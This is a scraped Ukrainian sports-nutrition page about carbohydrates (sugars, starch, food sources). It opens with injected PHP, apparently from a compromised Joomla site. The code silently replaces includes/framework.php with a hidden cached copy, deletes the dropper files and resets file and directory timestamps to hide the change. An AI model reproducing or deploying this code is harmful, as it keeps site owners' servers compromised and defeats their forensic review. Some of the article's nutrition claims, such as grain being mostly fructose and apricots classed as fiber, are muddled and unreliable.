$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Вуглеводи | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Вуглеводи

Більшу частину енергії, необхідної для нормальної життєдіяльності, організм людини одержує з вуглеводами. У спортсменів в міру збільшення інтенсивності й ваги фізичних навантажень потреба у вуглеводах збільшується і може зростати до 800 г на добу. Вуглеводи містяться переважно в продуктах рослинного походження. Дуже великий вміст вуглеводів (більше 65 г на 100 грам продукту): цукор (пісок), цукерки, мед, варення, мармелад, зефір, печиво здобне, рис, макарони, крупи манна, перлова, пшоно, гречана й вівсяна, фініки, ізюм, урюк, чорнослив. Великий вміст вуглеводів (40-60 г на 100 грам продукту): хліб (житній і пшеничний), квасоля, горох, шоколад, халва, тістечка.

Найбільш корисними вважаються вуглеводи, які проходять найменшу обробку в процесі приготування їжі. Наприклад, - хліб, приготовлений із цільних зерен, трошки проварена вівсяна каша. Ця корисна їжа має більшу кількість волокон, що допомагають організму втримувати рівень цукру в крові у нормальних межах.

Якщо ви вживаєте занадто багато вуглеводів, більше, ніж може перетравитися в глюкозу або глікоген (який відкладається в печінці та м'язах), то в результаті, як нам усім добре відомо, утворюється жир. Коли тілу потрібно більше палива, жир перетвориться назад у глюкозу, і вага тіла знижується.

Не ставтеся до вуглеводів занадто зневажливо. Вони в такій же мірі необхідні для здоров'я, як і інші живильні речовини, і в грамі вуглеводів містяться ті ж 4 калорії, що й у грамі білка.

Хоча не існує офіційних норм споживання вуглеводів, рекомендується мінімум 50 г на день, щоб уникнути кетозу, кислого стану крові, який може розвинутись, якщо для синтезу енергії використовуються переважно запаси жиру. Вуглеводи діляться на моносахариди, олігосахариди та полісахариди.

Моносахариди (прості вуглеводи) - найбільш прості представники вуглеводів і при гідролізі не розщеплюються до більш простих з'єднань. Для людини найбільш важливі глюкоза, фруктоза, галактоза, рибоза, дезоксирибоза.

Олігосахариди - більш складні з'єднання, побудовані з декількох (від 2 до 10) залишків моносахаридів. Найбільш важливі для людини сахароза, мальтоза й лактоза.

Полісахариди - високомолекулярні з'єднання - полімери, утворені з великої кількості моносахаридів. Вони діляться на перетравлювані і неперетравлювані в шлунково-кишковому тракті. До перетравлюваних відносять крохмаль і глікоген, із других для людини важливі клітковина, геміцеллюлоза й пектинові речовини.

Моносахариди та олігосахариди мають солодкий смак, у зв'язку із чим їх називають цукрами. Полісахариди солодкого смаку не мають. Якщо солодкий розчин сахарози брати за 100%, то солодка фруктоза 173%, глюкоза 81%, мальтоза і галактоза - 32% і лактоза-16%.

Глюкоза - складна одиниця, з якої побудовані всі найважливіші полісахариди - глікоген, крохмаль і целюлоза, також входить до складу сахарози, лактози і мальтози. Вона швидко всмоктується в кров зі шлунково-кишкового тракту, а потім надходить у клітини органів, де втягується в процеси біологічного окислення. Глюкоза найбільш легко та швидко засвоюване джерело енергії для людини. Для свого засвоєння вона вимагає інсулін. Роль глюкози особливо велика для центральної нервової системи, де вона є головним джерелом окислення. Вона легко перетворюється в глікоген.

Фруктоза менш поширена, ніж глюкоза, і також швидко окисляється. Частина фруктози в печінці перетворюється в глюкозу, але для свого засвоєння вона не вимагає інсуліну. Цією обставиною, а також значно більш повільним всмоктуванням фруктози порівняно із глюкозою в кишечнику, пояснюється краща переносимість її хворими цукровим діабетом.

Галактоза входить до складу молочного цукру (лактози). В організмі людини її більша частина перетворюється в печінці в глюкозу, а також бере участь у побудові геміцеллюлози.

Основними харчовими джерелами глюкози і фруктози служать мед, солодкі овочі і фрукти. Глюкоза та фруктоза містяться у всіх плодах. В зерні переважає фруктоза, а в клітковині (абрикоси, персики, сливи) - глюкоза. Моносахариди - найшвидше і якісне джерело енергії для процесів, що відбуваються в клітці.

Сахароза. Найважливіше харчове джерело її цукор. Потрапляючи в організм, вона легко розкладається на моносахариди. Але це можливо, якщо ми споживаємо сирий буряковий або очеретяний сік. Звичайний цукор має на багато більш складний процес засвоєння.

Лактоза (молочний цукор) - основний вуглевод молока і молочних продуктів. Її роль досить значна в ранньому дитячому віці, коли молоко служить основним продуктом харчування. При відсутності або зменшенні ферменту лактози, що розщеплює лактозу до глюкози та галактози, у шлунково-кишковому тракті наступає несприйнятливість молока.

Мальтоза (солодовий цукор) - проміжний продукт розщеплення крохмалю і глікогену в шлунково-кишковому тракті. У вільному виді в харчових продуктах вона зустрічається в меді, солоді, пиві, патоці та пророслому зерні.

Крохмаль - найважливіший постачальник вуглеводів. Він утворюється і накопичується в хлоропластах зелених частин рослини у формі маленьких зерняток, звідки шляхом гідролізних процесів переходить у водорозчинні цукри, які легко переносяться через клітинні мембрани і у такий спосіб попадають в інші частини рослини, в насіння, коріння, плоди тощо. В організмі людини крохмаль сирих рослин поступово розпадається в травному тракті, при цьому розпад починається ще в роті. Слина в роті частково перетворює його в мальтозу. От чому гарне пережовування їжі й змочування її слиною має винятково важливе значення.

Намагайтеся у своєму харчуванні частіше використовувати продукти, що містять природну глюкозу, фруктозу й сахарозу. Найбільша кількість цукру міститься в овочах, фруктах і сухофруктах, а також пророслому зерні.

Джерело: http://edimka.ru

 
Спортивне харчування Вуглеводи